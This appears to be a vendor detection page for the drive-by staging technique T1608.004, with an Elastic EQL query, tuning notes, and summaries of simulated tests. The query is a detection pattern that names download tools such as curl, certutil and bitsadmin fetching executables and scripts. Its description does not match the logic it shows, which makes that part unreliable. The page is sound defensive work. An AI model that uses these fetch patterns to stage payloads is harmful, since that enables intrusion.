Detect Drive-by Target in Elastic Security
Adversaries prepare operational websites to infect systems that visit over the normal course of browsing. This involves staging malicious JavaScript, exploit kit landing pages, browser profiling code (e.g., ScanBox), or trojanized downloads on adversary-controlled or compromised legitimate websites — including watering hole attacks targeting specific communities such as government agencies, industries, or regional groups. Staging methods include injecting malicious scripts into existing web pages, modifying files served from publicly writable cloud storage buckets, and purchasing malvertising space. Because staging occurs entirely on adversary infrastructure, direct detection is not possible from the victim side. Detection strategy focuses on victim-side downstream artifacts: browsers spawning unexpected child processes (exploitation indicator), executable files dropped by browser processes to temp directories, and browser network connections to newly registered or cloud-hosted infrastructure serving executable content.
MITRE ATT&CK
- Tactic
- Resource Development
- Technique
- T1608 Stage Capabilities
- Sub-technique
- T1608.004 Drive-by Target
- Canonical reference
- https://attack.mitre.org/techniques/T1608/004/
Elastic Detection Query
any where process.name : ("curl", "wget", "powershell.exe", "certutil.exe", "bitsadmin.exe") and (process.command_line : ("*.bin", "*.exe", "*.dll", "*.ps1", "*.bat", "*.vbs", "*.hta") or network.direction : "egress" and destination.port in (80, 443) and process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe", "cscript.exe"))Elastic EQL translation of the T1608.004 detection logic. Detects victim-side indicators of drive-by targeting using Microsoft Defender for Endpoint tables. Identifies two key exploitation patterns: (1) web b
Data Sources
Required Tables
False Positives & Tuning
- Browser extensions or plugins that legitimately spawn helper processes — e.g., PDF readers (AcroRd32.exe), video codec installers, accessibility tools launched via browser
- Legitimate software update mechanisms triggered through the browser — Chrome or Firefox update pipelines may invoke msiexec.exe or cmd.exe to apply updates
- Developer workflows using browser-based IDEs, build tools, or debugging extensions that spawn local script interpreters or Node.js processes
- Enterprise protocol handlers (custom URI schemes such as myapp://) that allow browsers to launch registered desktop applications or scripts
- Download managers integrated with browsers that save executable files to standard temp directories before user-initiated installation
Other platforms for T1608.004
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate Browser-Spawned Command Shell (Drive-by Exploitation Process Artifact)
Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe, CommandLine containing 'driveby-spawn-test'. ParentImage=powershell.exe in this test (in a real attack, ParentImage would be chrome.exe or msedge.exe). Sysmon Event ID 11: File Create for driveby-spawn-test.txt in %TEMP%. Security Event ID 4688 (if command line auditing enabled) showing cmd.exe process creation with full command line.
- Test 2Browser Executable File Drop to Temp Directory (Drive-by Payload Staging)
Expected signal: Sysmon Event ID 11: File Create with TargetFilename=%TEMP%\driveby-payload-test.exe, initiating process=powershell.exe (would be chrome.exe/msedge.exe in a real attack). File has MZ magic bytes confirming PE format. SHA256 hash of the 8-byte file will be logged by Defender.
- Test 3Drive-by Browser Fingerprinting Page Simulation (ScanBox-Style Reconnaissance)
Expected signal: Sysmon Event ID 1: Process Create for msedge.exe with --headless flag and file:// URI pointing to staged HTML. Sysmon Event ID 11: File Create for scanbox-sim.html in %TEMP% by PowerShell. Sysmon Event ID 3: Network Connection attempt from msedge.exe to 127.0.0.1:19876 (connection will fail — no listener — but the event fires). Browser console output (captured via --dump-dom) shows the fingerprinting script execution.
- Test 4Watering Hole Injection Simulation — Malicious Script Tag in Web Page
Expected signal: Sysmon Event ID 11: File Create for watering-hole-sim.html in %TEMP% by PowerShell. The file contains hex-encoded JavaScript obfuscation patterns (\x64\x6f\x63...) and Base64-encoded lure text matching SocGholish-style fake browser update prompts. SHA256 of the file can be submitted to threat intel platforms. In a real attack, this content would be injected into a legitimate website's HTML and served to visitors.
References (8)
- https://attack.mitre.org/techniques/T1608/004/
- https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
- http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
- https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1608.004/T1608.004.md
Unlock Pro Content
Get the full detection package for T1608.004 including response playbook, investigation guide, and atomic red team tests.